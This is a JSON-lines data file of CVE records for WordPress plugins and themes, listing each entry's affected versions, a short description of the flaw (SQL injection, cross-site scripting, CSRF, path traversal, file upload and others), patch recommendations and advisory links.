{"CVE_ID":"CVE-2024-13726","slug":"tc-ecommerce","versionImpact":"1.3.4","description":"The  Coder  WordPress plugin through 1.3.4 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec226d22-0c09-4e7c-86ec-b64819089b60\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec226d22-0c09-4e7c-86ec-b64819089b60\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1289","slug":"wc-checkout-getnet","versionImpact":"1.7.3","description":"The Plugin Oficial  WordPress plugin through 1.7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a296b59-f305-49a2-88b8-fca998f2c43e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a296b59-f305-49a2-88b8-fca998f2c43e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3750","slug":"network-posts-extended","versionImpact":"7.7.1","description":"The Network Posts Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018post_height\u2019 parameter in all versions up to, and including, 7.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/network-posts-extended\\\/trunk\\\/network-posts-extended.php#L663\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/network-posts-extended\\\/trunk\\\/network-posts-extended.php#L663\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/network-posts-extended\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/network-posts-extended\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64a15397-0bd6-4be9-90e3-6cb1f56394ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64a15397-0bd6-4be9-90e3-6cb1f56394ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-52811","slug":"davenport","versionImpact":"1.3","description":"Path Traversal vulnerability in Creanncy Davenport - Versatile Blog and Magazine WordPress Theme allows PHP Local File Inclusion. This issue affects Davenport - Versatile Blog and Magazine WordPress Theme: from n\/a through 1.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/davenport\\\/vulnerability\\\/wordpress-davenport-versatile-blog-and-magazine-wordpress-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/davenport\\\/vulnerability\\\/wordpress-davenport-versatile-blog-and-magazine-wordpress-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7852","slug":"wpbookit","versionImpact":"1.0.6","description":"The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle() function hooked via the 'add_new_customer' route in all versions up to, and including, 1.0.6. The plugin\u2019s image-upload handler calls move_uploaded_file() on client-supplied files without restricting allowed extensions or MIME types, nor sanitizing the filename. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-customer-controller.php#L362\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-customer-controller.php#L362\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3331165\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3331165\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbookit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbookit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0bb11092-4367-4f51-9dd7-22fbd655a03f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0bb11092-4367-4f51-9dd7-22fbd655a03f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2494","slug":"go_pricing","versionImpact":"3.3.19","description":"The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_postdata' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to modify access to the plugin when it should only be the administrator's privilege.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5779914a-a168-4835-8aea-e0ab2b3be4f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5779914a-a168-4835-8aea-e0ab2b3be4f6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0992","slug":"wp-simple-firewall","versionImpact":"17.0.17","description":"The Shield Security plugin for WordPress is vulnerable to stored Cross-Site Scripting in versions up to, and including, 17.0.17 via the 'User-Agent' header. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-firewall\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-firewall\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/162dff28-94ea-4a47-a6cb-a13317cf1a04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/162dff28-94ea-4a47-a6cb-a13317cf1a04?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2883864%40wp-simple-firewall%2Ftrunk&old=2883536%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2883864%40wp-simple-firewall%2Ftrunk&old=2883536%40wp-simple-firewall%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0689","slug":"custom-field-suite","versionImpact":"2.6.4","description":"The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a meta import in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on the meta values. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0897","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21d1feae-e70f-439d-8992-f136211fdde0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21d1feae-e70f-439d-8992-f136211fdde0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7688","slug":"azindex","versionImpact":"0.8.1","description":"The AZIndex WordPress plugin through 0.8.1 does not have CSRF checks in some places, which could allow attackers to make logged in admin delete arbitrary indexes via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c1d4354-b88b-46ca-b25a-efb9518f4955\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c1d4354-b88b-46ca-b25a-efb9518f4955\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10049","slug":"woo-edit-templates","versionImpact":"1.1.2","description":"The Edit WooCommerce Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page\u2019 parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-edit-templates\\\/trunk\\\/includes\\\/list-table-theme-templates.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-edit-templates\\\/trunk\\\/includes\\\/list-table-theme-templates.php#L87\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11605","slug":"wp-publications","versionImpact":"1.2","description":"The wp-publications WordPress plugin through 1.2 does not escape filenames before outputting them back in the page, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c5ee70-2ff5-46cd-a0f5-54987fc2e060\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c5ee70-2ff5-46cd-a0f5-54987fc2e060\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c5ee70-2ff5-46cd-a0f5-54987fc2e060\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91c5ee70-2ff5-46cd-a0f5-54987fc2e060\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13627","slug":"wp-touch-slider","versionImpact":"2.2","description":"The OWL Carousel Slider WordPress plugin through 2.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7e425a1-ae49-4ea6-abe4-42ba2713af8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7e425a1-ae49-4ea6-abe4-42ba2713af8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1973","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.6.2","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.6.2 via the download_file() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary log files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L751\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L751\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259688\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/users-customers-import-export-for-wp-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13b7a2e4-59f4-4d61-a165-a830ccfb696a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13b7a2e4-59f4-4d61-a165-a830ccfb696a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1288","slug":"wooexim","versionImpact":"5.0.0","description":"The WOOEXIM  WordPress plugin through 5.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make an unauthenticated user vulnerable to reflected XSS via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/175af35d-6972-42c9-b7ac-913ce1fbac64\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/175af35d-6972-42c9-b7ac-913ce1fbac64\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12561","slug":"wecantrack","versionImpact":"1.4.9","description":"The Affiliate Sales in Google Analytics and other tools plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.4.9. This is due to insufficient validation on the redirect url supplied via the 'afflink' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wecantrack\\\/trunk\\\/WecantrackApp.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wecantrack\\\/trunk\\\/WecantrackApp.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4b205ab-f042-46d9-a331-f18809477384?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4b205ab-f042-46d9-a331-f18809477384?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47447","slug":"wp-advanced-search","description":"Cross-Site Request Forgery (CSRF) vulnerability in Mathieu Chartier WordPress WP-Advanced-Search plugin <=\u00a03.3.8 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-advanced-search\\\/wordpress-wp-advanced-search-plugin-3-3-8-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-advanced-search\\\/wordpress-wp-advanced-search-plugin-3-3-8-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0832","slug":"under-construction-page","versionImpact":"3.96","description":"The Under Construction plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.96. This is due to missing or incorrect nonce validation on the install_weglot function called via the admin_action_install_weglot action. This makes it possible for unauthenticated attackers to perform an unauthorized install of the Weglot Translate plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/under-construction-page\\\/trunk\\\/under-construction.php?rev=2848705#L2389\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/under-construction-page\\\/trunk\\\/under-construction.php?rev=2848705#L2389\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fa84388-3597-4a54-9ae8-d6e04afe9061?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fa84388-3597-4a54-9ae8-d6e04afe9061?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-22672","slug":"vslider","versionImpact":"4.1.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Mr.Vibe vSlider Multi Image Slider for WordPress plugin <=\u00a04.1.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vslider\\\/wordpress-vslider-multi-image-slider-for-wordpress-plugin-4-1-2-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/vslider\\\/wordpress-vslider-multi-image-slider-for-wordpress-plugin-4-1-2-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1586","slug":"schema-and-structured-data-for-wp","versionImpact":"1.26","description":"The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom schema in all versions up to, and including, 1.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default the required authentication level is admin, but administrators have the ability to assign role based access to users as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e7e6ea7-4e0b-4d8a-9306-45b55d41fbb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e7e6ea7-4e0b-4d8a-9306-45b55d41fbb5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.26&old=3038020&new_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.27&new=3038020&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.26&old=3038020&new_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.27&new=3038020&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0896","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/button\\\/includes\\\/frontend.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/modules\\\/button\\\/includes\\\/frontend.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7687","slug":"azindex","versionImpact":"0.8.1","description":"The AZIndex WordPress plugin through 0.8.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b861f18a-40ae-4989-a8e4-37df1771ae23\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b861f18a-40ae-4989-a8e4-37df1771ae23\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10040","slug":"infinite-scroll","versionImpact":"2.6.2","description":"The Infinite-Scroll plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.2. This is due to missing or incorrect nonce validation on the process_ajax_edit and process_ajax_delete function. This makes it possible for unauthenticated attackers to make changes to plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4045575a-35f0-46e5-afb7-93eee9be3a97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4045575a-35f0-46e5-afb7-93eee9be3a97?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infinite-scroll\\\/trunk\\\/includes\\\/presets.php#L252\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infinite-scroll\\\/trunk\\\/includes\\\/presets.php#L252\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infinite-scroll\\\/trunk\\\/includes\\\/presets.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infinite-scroll\\\/trunk\\\/includes\\\/presets.php#L275\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13694","slug":"smart-wishlist-for-more-convert","versionImpact":"1.8.7","description":"The WooCommerce Wishlist (High customization, fast setup,Free Elementor Wishlist, most features) plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.8.7 via the download_pdf_file() function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to extract data from wishlists that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-wishlist-for-more-convert\\\/trunk\\\/includes\\\/class-wlfmc-form-handler.php#L607\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-wishlist-for-more-convert\\\/trunk\\\/includes\\\/class-wlfmc-form-handler.php#L607\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-wishlist-for-more-convert\\\/trunk\\\/includes\\\/class-wlfmc-wishlist.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-wishlist-for-more-convert\\\/trunk\\\/includes\\\/class-wlfmc-wishlist.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229758\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229758\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-wishlist-for-more-convert\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-wishlist-for-more-convert\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59fe7630-ab94-419f-aca5-39b74d86ae4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59fe7630-ab94-419f-aca5-39b74d86ae4e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13626","slug":"vr-frases","versionImpact":"3.0.1","description":"The VR-Frases (collect & share quotes) WordPress plugin through 3.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/511c6e7a-087f-41ef-9009-2525f332f8c6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/511c6e7a-087f-41ef-9009-2525f332f8c6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
